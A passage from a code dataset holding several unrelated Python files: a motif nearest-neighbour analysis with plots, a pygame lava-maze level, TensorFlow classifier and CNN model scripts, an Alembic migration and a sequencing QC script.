True\nplt.rcParams['axes.unicode_minus'] = True\n\n\ndef find_nearest_neighbours(current_combo, all_combos):\n neighbours = []\n\n min_nighbour_distance = 1e10\n\n for idx, potential_neighbour in enumerate(all_combos):\n if np.array_equal(potential_neighbour, current_combo):\n continue\n\n diff_combos = np.sum(np.absolute(np.subtract(potential_neighbour, current_combo)))\n\n\n if abs(diff_combos) == min_nighbour_distance:\n neighbours.append(idx)\n\n\n elif abs(diff_combos) < min_nighbour_distance:\n min_nighbour_distance = abs(diff_combos)\n print(min_nighbour_distance)\n print(current_combo)\n print(potential_neighbour)\n print(\"\")\n\n neighbours = [idx]\n\n else:\n continue\n\n\n return neighbours\n\n\ndef find_additive_nearest_neighbours(current_combo, all_combos, feature_idx, feature_name):\n neighbour_idxs = []\n min_nighbour_distance = 1e10\n\n current_feature_value = current_combo[feature_idx]\n\n # Subset for only models that have feature value + 1\n subset_all_combos = all_combos.loc[all_combos[feature_name] == current_feature_value + 1]\n\n for idx, row in subset_all_combos.iterrows():\n\n candidate = row.values\n if np.array_equal(candidate, current_combo):\n continue\n\n diff_combos = np.sum(np.absolute(np.subtract(candidate, current_combo)))\n\n\n if abs(diff_combos) == min_nighbour_distance:\n neighbour_idxs.append(idx)\n\n\n elif abs(diff_combos) < min_nighbour_distance:\n min_nighbour_distance = abs(diff_combos)\n\n neighbour_idxs = [idx]\n\n else:\n continue\n\n return neighbour_idxs\n\ndef get_motif_neighbours(output_dir, load_pickle=False, remove_zero_change=False):\n model_space_report_df = pd.read_csv(output_dir + \"combined_model_space_report_with_motifs.csv\")\n output_path = output_dir + \"motif_comparison.pdf\"\n\n motif_columns = ['permissive_counts', 'dependent_counts',\n 'submissive_counts', 'hedonistic_counts',\n 'defensive_counts', 'logistic_counts', 'opportunistic_counts',\n 'exponential_counts']\n\n motif_columns = ['permissive_counts', 'dependent_counts',\n 'submissive_counts', 'hedonistic_counts',\n 'defensive_counts', 'logistic_counts', 'opportunistic_counts',\n 'exponential_counts']\n\n\n motif_columns = ['SL1', 'SL2', 'SL3', 'SL4', 'OL1', 'OL2', 'OL3', 'OL4']\n\n feature_effects_dict = {}\n if load_pickle:\n with open(output_dir + 'feature_effects_dict.pickle', 'rb') as handle:\n feature_effects_dict = pickle.load(handle)\n\n else:\n for feature_idx, feature_name in enumerate(motif_columns):\n feature_effects = []\n n_additive_neighbours = 0\n\n # Iterate all systems\n for idx, row in model_space_report_df.iterrows():\n\n # Current model marginal\n current_marginal = row['norm_marginal_means']\n\n # Current encoded \n enc_system = row[motif_columns].values\n\n neighbour_idxs = find_additive_nearest_neighbours(enc_system, model_space_report_df[motif_columns], feature_idx, feature_name)\n\n n_additive_neighbours += len(neighbour_idxs) \n neighbours_df = model_space_report_df[model_space_report_df.index.isin(neighbour_idxs)]\n print(\"mdel_ref: \", row['model_idx'])\n print(\"marginal mean: \", row['norm_marginal_means'])\n print(\"\")\n\n feature_effects += [x - current_marginal for x in neighbours_df['norm_marginal_means'].values] \n\n feature_effects_dict[motif_columns[feature_idx]] = feature_effects\n\n with open(output_dir + 'feature_effects_dict.pickle', 'wb') as handle:\n pickle.dump(feature_effects_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n if remove_zero_change:\n for k in feature_effects_dict.keys():\n k_values = feature_effects_dict[k]\n k_values = [x for x in k_values if x != 0.0]\n feature_effects_dict[k] = k_values\n\n\n for k in feature_effects_dict.keys():\n k_values = feature_effects_dict[k]\n print(k,len(k_values))\n feature_effects_dict[k] = k_values\n\n print(\"\")\n\n motif_stdev = []\n motif_median = []\n motif_data = []\n\n all_data_names = []\n all_data_points = []\n all_data_medians = []\n\n for f in motif_columns:\n median_effect = np.median(feature_effects_dict[f])\n effect_std = np.std(feature_effects_dict[f])\n motif_stdev.append(effect_std)\n motif_median.append(median_effect)\n motif_data.append(feature_effects_dict[f])\n\n for x in feature_effects_dict[f]:\n all_data_names.append(f)\n all_data_points.append(x)\n all_data_medians.append(median_effect)\n\n\n df_data = {'name': motif_columns, 'all_data': motif_data, 'median': motif_median, 'stdev': motif_stdev}\n all_data_df = {'name': all_data_names, 'all_data_points': all_data_points, 'all_data_median': all_data_medians}\n \n all_data_df = pd.DataFrame(all_data_df)\n # all_data_df.sort_values('all_data_median', inplace=True, ascending=False)\n sorter = motif_columns\n sorter_index = dict(zip(sorter,range(len(sorter))))\n all_data_df['name_order'] = all_data_df['name'].map(sorter_index)\n all_data_df.sort_values('name_order', inplace=True, ascending=True)\n\n all_data_df.to_csv(output_dir + 'motif_datapoints.csv')\n print(all_data_df.columns)\n\n print(list(set(all_data_df['name'].values)))\n diverging_colours = sns.color_palette(\"RdBu_r\", len(motif_columns) + 2)\n diverging_colours.pop(5)\n diverging_colours.pop(4)\n\n output_path = output_dir + \"motif_comparison_boxplot_horz.pdf\"\n\n height_inches = 3 * 77 / 25.4\n width_inches = 3 * 85 / 25.4\n fig, ax = plt.subplots(figsize=(width_inches, height_inches))\n\n colour_list = ['#1d71b8', '#1d71b8', '#1d71b8', '#1d71b8', '#e30613', '#e30613', '#e30613', '#e30613']\n custom_pal = sns.color_palette(colour_list)\n # sns.barplot(x='name', y='mean', \n # data=analysis_df, alpha=0.9, ax=ax, palette=diverging_colours, vert=False)\n\n # analysis_df.plot(\"name\", \"mean\", kind=\"barh\", color=diverging_colours, ax=ax, title='', width=1)\n \n if 1:\n sns.stripplot(x=\"all_data_points\", y=\"name\", data=all_data_df, ax=ax, size=5,\n orient=\"h\", palette=custom_pal, zorder=10)\n sns.boxplot(x=\"all_data_points\", y=\"name\", data=all_data_df, ax=ax, orient=\"h\", palette=diverging_colours,\n boxprops={'facecolor':'None'}, showfliers=False, linewidth=2)\n \n # whiskerprops={'linewidth':0, \"zorder\":0}, showcaps=False,\n # plt.scatter()\n ax.set_xlabel('')\n ax.set_yticklabels('')\n ax.set_ylabel('')\n ax.tick_params(labelsize=30)\n\n ax.set(xlim=(None, None))\n ax.set(ylim=(None, None))\n\n ax.spines[\"right\"].set_visible(False)\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"bottom\"].set_visible(True)\n\n ax.spines[\"bottom\"].set_alpha(0.5)\n ax.spines[\"left\"].set_alpha(0.5)\n ax.margins(x=0)\n ax.margins(y=0)\n\n ax.legend().remove()\n\n fig.tight_layout()\n plt.savefig(output_path, dpi=500, bbox_inches='tight')\n\n output_path = output_dir + \"motif_comparison_box.pdf\"\n\n if 1:\n fig, ax = plt.subplots(figsize=(8.5, 5.11))\n\n # sns.stripplot(x=\"all_data_points\", y=\"name\", data=all_data_df, ax=ax, size=4,\n # orient=\"h\", palette=diverging_colours, zorder=10)\n sns.violinplot(x=\"all_data_points\", y=\"name\", data=all_data_df, ax=ax, orient=\"h\", color=\"white\", \n showfliers=False, linewidth=2, width=0.9, scale_hue=False, saturation=1.0\n )\n ax.collections[0].set_edgecolor(diverging_colours)\n\n ax.set_xlabel('normalised marginal change')\n ax.set_yticklabels([])\n ax.set_ylabel([])\n\n ax.spines[\"right\"].set_visible(False)\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"bottom\"].set_visible(True)\n\n ax.spines[\"bottom\"].set_alpha(0.5)\n ax.spines[\"left\"].set_alpha(0.5)\n\n ax.legend().remove()\n\n fig.tight_layout()\n plt.savefig(output_path, dpi=500)\n\n plt.rcParams['ytick.left'] = False\n plt.rcParams['xtick.bottom'] = False\n\n plt.minorticks_on()\n\n width_inches = 200 / 25.4\n height_inches = 120 / 25.4\n\n fig, axes = plt.subplots(ncols=2, nrows=int(len(motif_columns)/2), figsize=(width_inches, height_inches))\n output_path = output_dir + \"motif_kde.pdf\"\n bins = np.arange(-1, 1.1, 0.1)\n print(bins)\n idx = 0\n\n\n for ax, motif_name in zip(axes.flat, motif_columns):\n \n sns.distplot(feature_effects_dict[motif_name], bins=bins, norm_hist=False, kde=False, hist=True, ax=ax, label=motif_name, color=colour_list[idx], hist_kws={'range': (-1, 1), 'linewidth': 0.0, 'alpha': 1.0})\n\n ax.spines[\"right\"].set_visible(False)\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"bottom\"].set_visible(True)\n\n ax.spines[\"bottom\"].set_alpha(0.5)\n ax.spines[\"left\"].set_alpha(0.5)\n ax.set_yscale('log')\n ax.set_ylim([1, 10**4])\n ax.set_yticks([1, 10**2, 10**4], minor=False)\n ax.set_xticks([-1, 0, 1], minor=False)\n\n ax.set_xlim(-1, 1)\n ax.set_yticklabels('')\n ax.set_ylabel('')\n ax.set_xticklabels('')\n\n idx += 1\n\n fig.tight_layout()\n plt.savefig(output_path, dpi=500)\n\n\ndef test():\n a = [0, 0, 0]\n b = [1, 0, 0]\n c = [2, 2, 0]\n d = [0, 0, 1]\n\n marginal_a = 0.05\n marginal_b = 0.5\n marginal_c = 0.3\n marginal_d = 0.15\n\n feature_idxs = list(range(3))\n\n\n models = [a, b, c, d]\n\n for x in feature_idxs:\n\n # Check if adding the feature to the model results in a change in model marginal probability\n for m in models:\n\n min_nighbour_distance = 100\n neighbours = []\n\n # Find nearest neighbours to m\n for neigh_idx, potential_neighbour in enumerate(models):\n\n if m == potential_neighbour:\n continue\n\n if abs(sum(m) - sum(a)) == min_nighbour_distance:\n neighbours.append(potential_neighbour)\n\n\n elif abs(sum(m) - sum(a)) < min_nighbour_distance:\n min_nighbour_distance = abs(sum(m) - sum(potential_neighbour))\n neighbours = [potential_neighbour]\n\n else:\n continue\n\n # From neighbours, find those that have 1 extra of feature\n for n in neighbours:\n if n[x] == m[x] + 1:\n print(x, n)\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"data_analysis/nearest_neighbours.py","file_name":"nearest_neighbours.py","file_ext":"py","file_size_in_byte":11306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"425295759","text":"import person , movements1\r\n\r\nimport sys\r\nimport os\r\nimport time\r\nimport math\r\nimport tiledtmxloader\r\nfrom pygame import mixer\r\nimport pygame\r\ntry:\r\n import _path\r\nexcept:\r\n pass\r\nimport palace\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\ndef main():\r\n \r\n demo_pygame('./maps/palace.tmx')\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\ndef demo_pygame(file_name):\r\n \"\"\"\r\n Example showing how to use the paralax scrolling feature.\r\n \"\"\"\r\n \r\n HERO_HEALTH = 100\r\n file = './sounds/lava_back.ogg'\r\n # parser the map (it is done here to initialize the\r\n # window the same size as the map if it is small enough)\r\n world_map = tiledtmxloader.tmxreader.TileMapParser().parse_decode(file_name)\r\n # loading the sound files in different sound formats of mixer and main background sound in mixer stream \r\n mixer.init()\r\n sound_fall = mixer.Sound('./sounds/scream2.ogg')\r\n mixer.music.load(file)\r\n mixer.music.play(-1);\r\n # init pygame and set up a screen\r\n pygame.display.set_caption(\"tiledtmxloader - \" + file_name + \\\r\n \" - keys: arrows, 0-9\")\r\n screen_width = min(1024, world_map.pixel_width)\r\n screen_height = min(768, world_map.pixel_height)\r\n screen = pygame.display.set_mode((screen_width, screen_height))\r\n\r\n # load the images using pygame\r\n resources = tiledtmxloader.helperspygame.ResourceLoaderPygame()\r\n resources.load(world_map)\r\n\r\n # prepare map rendering\r\n assert world_map.orientation == \"orthogonal\"\r\n\r\n # renderer\r\n renderer = tiledtmxloader.helperspygame.RendererPygame()\r\n\r\n # create hero sprite\r\n # use floats for hero position\r\n hero_pos_x = 32*32 #32*32\r\n hero_pos_y = 39*32 + 20 #19*32\r\n hero = person.create_person(hero_pos_x, hero_pos_y ,'./images/hero_u2.png')\r\n hero_width = hero.rect.width\r\n hero_height = 5\r\n # palcing chest sprite as the key\r\n chest = person.create_person(29*32+16,17*32,'./images/closed_chest.png')\r\n \r\n # cam_offset is for scrolling\r\n cam_world_pos_x = 1024/2\r\n cam_world_pos_y = 768/2\r\n # set initial cam position and size\r\n renderer.set_camera_position_and_size(cam_world_pos_x, cam_world_pos_y, \\\r\n screen_width, screen_height)\r\n\r\n # retrieve the layers\r\n sprite_layers = tiledtmxloader.helperspygame.get_layers_from_map(resources)\r\n\r\n # filter layers\r\n sprite_layers = [layer for layer in sprite_layers if not layer.is_object_group]\r\n\r\n # add the hero the the right layer, it can be changed using 0-9 keys\r\n sprite_layers[3].add_sprite(hero)\r\n sprite_layers[2].add_sprite(chest)\r\n \r\n # set up timer for fps printing\r\n pygame.time.set_timer(pygame.USEREVENT, 1000)\r\n \r\n # variables for the main loop\r\n clock = pygame.time.Clock()\r\n running = True\r\n speed = 2.75\r\n mr=ml=md=mu=0\r\n lava_list = []\r\n # setting up different direction to check for in 4 tile section of map \r\n \"\"\"\r\n In the 4 tiles to be walkable each tile among them is connected to 2 other 4 tile sections so if hero \r\n is on that tile only them the other 2 4 tile section will be isible as lava or not lava(walkable or not walkable )\r\n stored in different dirx and diry for all 4 tiles in a 4 tile section\r\n \"\"\"\r\n dirx = [[0 for x in range(2)] for x in range(4)]\r\n diry = [[0 for x in range(2)] for x in range(4)]\r\n dirx[0][0] = -1 \r\n dirx[0][1] = 0 \r\n dirx[1][0] = 0\r\n dirx[1][1] = 1\r\n dirx[2][0] = -1\r\n dirx[2][1] = 0\r\n dirx[3][0] = 1\r\n dirx[3][1] = 0\r\n diry[0][0] = 0\r\n diry[0][1] = -1\r\n diry[1][0] = -1\r\n diry[1][1] = 0\r\n diry[2][0] = 0\r\n diry[2][1] = 1\r\n diry[3][0] = 0\r\n diry[3][1] = 1\r\n # string the walable path in the matrix by loading the tile data from 2nd layer of map\r\n matrix = [[None for x in range(10)] for x in range(10)]\r\n \r\n for i in range(10 ):\r\n for j in range(10):\r\n if sprite_layers[1].content2D[(10+i)*2][(10+j)*2] is None:\r\n matrix[i][j] = create_lava(10+j,10+i)#opp in case of content2D\r\n #sprite_layers[2].add_sprite(matrix[i][j])\r\n lava_list.append(matrix[i][j].rect)\r\n #sys.stdout.write('1 ')\r\n #else: sys.stdout.write('0 ')\r\n #print \" \"\r\n # for storing the current visible lava and editing them dynamically along with the motion of the hero\r\n active_list = []\r\n # stores the last position of the hero \r\n old = (-1,-1)\r\n flag =0\r\n # 3 portals for chest and 2 gates \r\n portal1 = pygame.Rect(28*32,15*32,96,64)#key place\r\n portal2 = pygame.Rect(21*32,10*32,96,96)#left door\r\n portal3 = pygame.Rect(35*32,10*32,96,96)#right door\r\n # mainloop\r\n while running:\r\n dt = clock.tick(40)\r\n\r\n # event handling\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n elif event.type == pygame.USEREVENT:\r\n print(\"fps: \", clock.get_fps())\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n running = False\r\n \r\n \r\n # find directions\r\n #print pygame.key.get_pressed()[pygame.K_SPACE] \r\n mov = movements1.hero_move(mr,ml,md,mu,hero_pos_x,hero_pos_y,hero,speed,sprite_layers[4])\r\n mr = mov[0]\r\n ml = mov[1]\r\n md = mov[2]\r\n mu = mov[3]\r\n hero_pos_x = mov[4]\r\n hero_pos_y = mov[5]\r\n if(hero_pos_y < 20 *32):\r\n mixer.music.stop()\r\n # stopping the fast music after crossing the path of lava\r\n if(flag == 0 and portal1.collidepoint(hero.rect.midtop)):\r\n #print \"collision deteected\"\r\n # for checkign with the key taken from the chest\r\n \r\n if(pygame.key.get_pressed()[pygame.K_SPACE]==1):\r\n flag = 1\r\n chest.image = pygame.image.load('./images/open_chest.png')\r\n key_riddle=person.create_person(hero.rect.centerx,hero.rect.centery+200,'./images/lava_riddle.png')\r\n sprite_layers[3].add_sprite(key_riddle)\r\n #ring_take.rect.topleft=(1,1)\r\n for sprite_layer in sprite_layers:\r\n if sprite_layer.is_object_group:\r\n # we dont draw the object group layers\r\n # you should filter them out if not needed\r\n continue\r\n else:\r\n renderer.render_layer(screen, sprite_layer)\r\n\r\n pygame.display.flip()\r\n i=0\r\n while(i!=1): ##Infinite loop until menu is to be removed\r\n for event in pygame.event.get():\r\n if (event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE):\r\n i=1\r\n continue\r\n sprite_layers[3].remove_sprite(key_riddle)\r\n #print \"detected key here\"\r\n # code for taking key and riddle\r\n elif(flag == 1 and portal2.collidepoint(hero.rect.midtop)):\r\n # for the wronng decision start from the beginning\r\n if(pygame.key.get_pressed()[pygame.K_SPACE]==1):\r\n hero_pos_x = 32 * 32\r\n hero_pos_y = 40 * 32\r\n mixer.music.play()\r\n elif(flag == 1 and portal3.collidepoint(hero.rect.midtop)):\r\n #if right path chosesn changing to next map\r\n if(pygame.key.get_pressed()[pygame.K_SPACE]==1):\r\n #condition on successful transition\r\n #print \"detected right path\"\r\n #music.mixer.stop()\r\n portal=True\r\n running=False\r\n # checking the midbottom of hero(foot ) if found in any rectangle of the tiles in activelist then dead \r\n for i in range(len(active_list)):\r\n if(active_list[i].rect.collidepoint(hero.rect.midbottom)):\r\n hero_pos_x = 32 * 32 \r\n hero_pos_y = 40 * 32\r\n mixer.music.stop()\r\n sound_fall.play()\r\n time.sleep(2)\r\n mixer.music.play()\r\n #updating the activelist with the position of the hero \r\n x_tile = (int)(hero_pos_x // 32)\r\n y_tile = (int)(hero_pos_y // 32)\r\n new = (x_tile, y_tile)\r\n # storing the tile numeber of the hero \r\n if(old != new):\r\n # if the hero has changed its tile only then this check will be called for fast processing \r\n if(len(active_list)>0):\r\n # emptying out the last active list \r\n while( len(active_list) > 0):\r\n sprite_layers[2].remove_sprite(active_list[0])\r\n active_list.pop(0)\r\n # getting tile number in 4 tile section to check for which direction to select from above defined direction dataset\r\n n = get_tile_no(x_tile, y_tile)\r\n \r\n for i in range(2):\r\n # to check for the new tilesection are they in matrix laoded above \r\n x = ((x_tile + dirx[n][i])//2 - 10)\r\n y = ((y_tile + diry[n][i])//2 - 10)\r\n if( 0 <= x <10 and 0 <= y < 10 ):\r\n if(matrix[y][x] is not None and not sprite_layers[2].contains_sprite(matrix[y][x])):\r\n # appending the kill tiles in the active list \r\n sprite_layers[2].add_sprite(matrix[y][x])\r\n active_list.append(matrix[y][x])\r\n\r\n \r\n #renderer.set_camera_position(hero.rect.centerx, hero.rect.centery)\r\n # moving the camera positon acc to the hero location in the map\r\n cam_pos_x = hero.rect.centerx\r\n cam_pos_y = hero.rect.centery\r\n if hero.rect.centerx <= 520 :\r\n cam_pos_x = 520\r\n elif hero.rect.centerx >=((42*32)-530):\r\n cam_pos_x = ((42*32)-530)\r\n if hero.rect.centery >= 44*32-400:\r\n cam_pos_y = 44*32-400\r\n elif hero.rect.centery <=408:\r\n cam_pos_y = 408\r\n renderer.set_camera_position(cam_pos_x,cam_pos_y)\r\n\r\n # clear screen, might be left out if every pixel is redrawn anyway\r\n screen.fill((0, 0, 0))\r\n\r\n # render the map\r\n for sprite_layer in sprite_layers:\r\n if sprite_layer.is_object_group:\r\n # we dont draw the object group layers\r\n # you should filter them out if not needed\r\n continue\r\n else:\r\n renderer.render_layer(screen, sprite_layer)\r\n\r\n pygame.display.flip()\r\n\r\n if portal==True:\r\n palace.main()\r\n\r\n# -----------------------------------------------------------------------------\r\ndef create_lava(tile_64_x, tile_64_y):\r\n # creating lava sprite at given tile position of size = to 4 tiles \r\n image = pygame.image.load('./images/lava.png')\r\n rect = image.get_rect()\r\n rect.midbottom = ((tile_64_x * 64)+32, (tile_64_y * 64) +64)\r\n return tiledtmxloader.helperspygame.SpriteLayer.Sprite(image, rect)\r\n\r\ndef get_tile_no(x,y):\r\n # getting the tile number in 4 section tile set \r\n if x%2==0 and y%2 ==0:\r\n return 0;\r\n elif x%2 == 1 and y%2 == 1 :\r\n return 3;\r\n elif x%2 == 0 and y%2 == 1:\r\n return 2;\r\n else:\r\n return 1;\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n","sub_path":"source code/pal_lava.py","file_name":"pal_lava.py","file_ext":"py","file_size_in_byte":11666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"328931333","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\n\n#flag\ntraining_step =2000\ndata_dim = 784\nbatch_number = 6\nbatch_size = 13*15*10\ndir = 'data/data_provided/'\n\n# prepare data\nbatch0 = np.load(dir+'batch0.npy')\nbatch1 = np.load(dir+'batch1.npy')\nbatch2 = np.load(dir+'batch2.npy')\nbatch3 = np.load(dir+'batch3.npy')\nbatch4 = np.load(dir+'batch4.npy')\nbatch5 = np.load(dir+'batch5.npy')\nlabel = np.load(dir+'label.npy')\n\ntraindata = np.vstack([batch0, batch1])\ntrainlabel = np.hstack([label, label])\ntestdata = np.vstack([batch4])\ntestlabel = np.hstack([label])\n\n\n# Specify that all features have real-value data\n# feature_columns is a list\nfeature_columns = [tf.contrib.layers.real_valued_column(\"\", dimension=data_dim)]\n\n# Build 3 layer DNN with 10, 20, 10 units respectively.\nclassifier = tf.contrib.learn.DNNClassifier(feature_columns=feature_columns,\n hidden_units=[100],\n n_classes=10,\n optimizer=tf.train.ProximalAdagradOptimizer(\n learning_rate=0.1,\n l1_regularization_strength=0.001\n ),\n model_dir=\"data/log\")\n\n# Fit model.\nclassifier.fit(x=traindata.astype('float32'),\n y=trainlabel.astype('int32'),\n steps=training_step)\n\n# Evaluate accuracy.\naccuracy_score = classifier.evaluate(x=testdata.astype('float32'),\n y=testlabel.astype('int32'))[\"accuracy\"]\nprint('Accuracy: {0:f}'.format(accuracy_score))\n\n# Classify two new flower samples.\ny = list(classifier.predict(testdata.astype('float32'), as_iterable=True))\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"141607482","text":"\"\"\"empty message\n\nRevision ID: 73c826f0fb93\nRevises: 02c353311e35\nCreate Date: 2021-08-16 17:01:02.023364\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '73c826f0fb93'\ndown_revision = '02c353311e35'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('month',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('created', sa.DateTime(), nullable=True),\n sa.Column('modified', sa.DateTime(), nullable=True),\n sa.Column('order', sa.Numeric(), nullable=True),\n sa.Column('label', sa.String(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.add_column('plant', sa.Column('harvest_day', sa.Integer(), nullable=True))\n op.add_column('plant', sa.Column('sprout_day', sa.Integer(), nullable=True))\n op.add_column('plant', sa.Column('start_day', sa.Integer(), nullable=True))\n op.add_column('plant', sa.Column('transplant_day', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('plant', 'transplant_day')\n op.drop_column('plant', 'start_day')\n op.drop_column('plant', 'sprout_day')\n op.drop_column('plant', 'harvest_day')\n op.drop_table('month')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/73c826f0fb93_.py","file_name":"73c826f0fb93_.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"435153609","text":"#!/usr/bin/env python\n\"\"\"\nSpyder Editor\n\nauthor: lml\n\nMiseq测序质量报告\n\"\"\"\nimport os\nimport argparse\n\ndef readGenus(path):\n ret = {}\n names = []\n with open(path) as f:\n l0 = f.readline()\n for x in l0.strip().split('\\t')[1:]:\n ret[x[:10]] = {}\n names.append(x[:10])\n for l in f:\n l2 = l.strip().split('\\t')\n for i in range(len(names)):\n ret[names[i]][l2[0]] = l2[i+1]\n return ret\n\n\ndef main():\n parser = argparse.ArgumentParser(description='QC')\n parser.add_argument('-f','--file',required=True,action ='append',help='genus.xls file for two batches')\n parser.add_argument('-o','--out',help='out path')\n args = parser.parse_args()\n fs = args.file\n outfile = args.out\n if outfile is None:\n outfile = 'QC_'+'_'.join([x.replace('genus','').replace('.xls','') for x in fs])+'.txt'\n d1 = readGenus(fs[0])\n d2 = readGenus(fs[1])\n\n qcid = [x for x in d1.keys() if x in d2.keys()]\n #with open('aaa.txt','w') as f:\n #f.write(','.join(qcid))\n if len(qcid)==0:\n raise Exception('No identical Pid encountered')\n genusid = set([x for x in d1[qcid[0]].keys()]+[x for x in d2[qcid[0]].keys()])\n\n newarray = []\n newarray.append(['Taxon']+[x for x in genusid])\n for x in qcid:\n newarray.append([x]+[d1[x].get(y,'0') for y in genusid])\n newarray.append([x+'qc']+[d2[x].get(y,'0') for y in genusid])\n\n res = [x for x in zip(*newarray)]\n with open(outfile,'w') as f:\n for x in res:\n f.write('\\t'.join(x)+'\\n')\n os.system('python /var/s5/script/QC/ggplot2_bar_box_bubble.py -i {} -p 0.01'.format(outfile))\n os.system('rm gg*r')\n\nif __name__=='__main__':\n main()\n","sub_path":"script/QC/QC.py","file_name":"QC.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"182123190","text":"import tensorflow as tf\nimport csv\nimport os\nimport numpy as np\nimport tf_metrics\nfrom utils.custom_hook import EvalResultHook, PrintValueHook\n\n# In case of needing l2-regularization: https://stackoverflow.com/questions/44232566/add-l2-regularization-when-using-high-level-tf-layers/44238354#44238354\ninitilizer = \"he_uniform\"\n\n\n# Default stride of 1, padding:same\ndef cnn_1d(inp,\n conv_filter_size, # [Scalar]\n num_filters, # [Scalar]\n mode,\n activation=tf.nn.relu,\n stride=1,\n padding='valid',\n input_shape=None,\n name='', kernel_regularizer=0.0): # Stride of CNN\n # We shall define the weights that will be trained using create_weights function.\n if input_shape is None:\n layer = tf.keras.layers.Conv1D(num_filters, conv_filter_size, strides=stride, padding=padding,\n activation=activation, kernel_initializer=initilizer,\n kernel_regularizer=tf.keras.regularizers.l2(kernel_regularizer), name=name)\n output = layer(inp)\n else:\n layer = tf.keras.layers.Conv1D(num_filters, conv_filter_size, strides=stride, padding=padding,\n activation=activation, input_shape=input_shape, kernel_initializer=initilizer,\n kernel_regularizer=tf.keras.regularizers.l2(kernel_regularizer), name=name)\n output = layer(inp)\n return output\n\n\ndef max_pool_layer_1d(layer, pooling_size, name=None, stride=-1):\n # Set stride equals to pooling size unless specified\n if stride == -1:\n stride = pooling_size\n return tf.keras.layers.MaxPool1D(pooling_size, stride, padding=\"same\")(layer)\n\n\n# Default stride of 1, padding:same\ndef cnn_2d(layer,\n conv_filter_size, # [Scalar]\n num_filters, # [Scalar]\n activation=tf.nn.relu,\n stride=1,\n padding='valid',\n name='',\n kernel_regularizer=0.0): # Stride of CNN\n # We shall define the weights that will be trained using create_weights function.\n layer = tf.keras.layers.Conv1D(num_filters, kernel_size=conv_filter_size, strides=stride, padding=padding,\n activation=activation,\n kernel_regularizer=tf.keras.regularizers.l2(kernel_regularizer))(layer)\n\n # cnn_sum = tf.summary.histogram(name+'_activation',layer)\n return layer\n\n\ndef flatten_layer(layer): # Flatten from 2D/3D to 1D (not count batch dimension)\n layer = tf.keras.layers.Flatten()(layer)\n return layer\n\n\ndef fc_layer(inp, #\n num_outputs,\n mode,\n activation=tf.nn.relu,\n name='',\n kernel_regularizer=0.0):\n # Let's define trainable weights and biases.\n layer = tf.keras.layers.Dense(num_outputs, activation=activation, kernel_initializer=initilizer,\n kernel_regularizer=tf.keras.regularizers.l2(kernel_regularizer))\n output = layer(inp)\n return output\n\n\ndef avg_pool_layer(layer, pooling_size, name=None, stride=-1):\n # Set stride equals to pooling size unless specified\n if stride == -1:\n stride = pooling_size\n return tf.keras.layers.AveragePooling2D(pooling_size, stride, padding=\"same\")(layer)\n\n\ndef max_pool_layer(layer, pooling_size, name=None, stride=-1):\n # Set stride equals to pooling size unless specified\n if stride == -1:\n stride = pooling_size\n return tf.keras.layers.MaxPooling2D(pooling_size, stride, padding=\"same\")(layer)\n\n\ndef max_and_cnn_layer(layer, pl_size, num_filters, activation, name):\n pool = tf.keras.layers.MaxPooling2D(pl_size, strides=pl_size, padding=\"same\")(layer)\n conv = tf.keras.layers.Conv2D(num_filters, pl_size, strides=pl_size, padding=\"same\",\n activation=activation)(layer)\n concat = tf.keras.layers.concatenate([pool, conv], 3)\n return concat\n\n\nl2_regularizer = 0.001\n\n\n# Using max pooling\ndef model_cnn_1d(features, mode, params, config):\n # print(features)\n require_channel = 2\n params['dropout_rate'] = 0.3\n assert len(params['channels']) == require_channel, \\\n \"This model need {} channels input, current input: {}\".format(require_channel, params['channels'])\n # Input size:300x8\n '''\n This model is based on \"A Comparison of 1-D and 2-D Deep Convolutional Neural Networks in ECG Classification\"\n '''\n # (1) Filter size: 7x32, max pooling of k3 s2\n conv1 = cnn_1d(features['image'], 7, params['channels'][0] * 16,\n mode=mode,\n activation=params['activation'],\n name=\"conv1\",\n input_shape=(300, 8),\n kernel_regularizer=l2_regularizer)\n conv1 = tf.layers.batch_normalization(conv1)\n pool1 = max_pool_layer_1d(conv1, 3, name=\"pool1\", stride=2)\n # Output: 294x32 -> 147x32\n # (2) Filter size: 5x64, max pooling of k3 s2\n conv2 = cnn_1d(pool1, 5, params['channels'][0] * 32,\n mode=mode,\n activation=params['activation'], name=\"conv2\",\n kernel_regularizer=l2_regularizer)\n conv2 = tf.layers.batch_normalization(conv2)\n pool2 = max_pool_layer_1d(conv2, 3, \"pool2\", stride=2)\n # Output: 143x64 -> 71x64\n\n # (3) Filter size: 3x128 (3 times), max pooling of k3 s2\n conv3 = cnn_1d(pool2, 3, params['channels'][0] * 64,\n 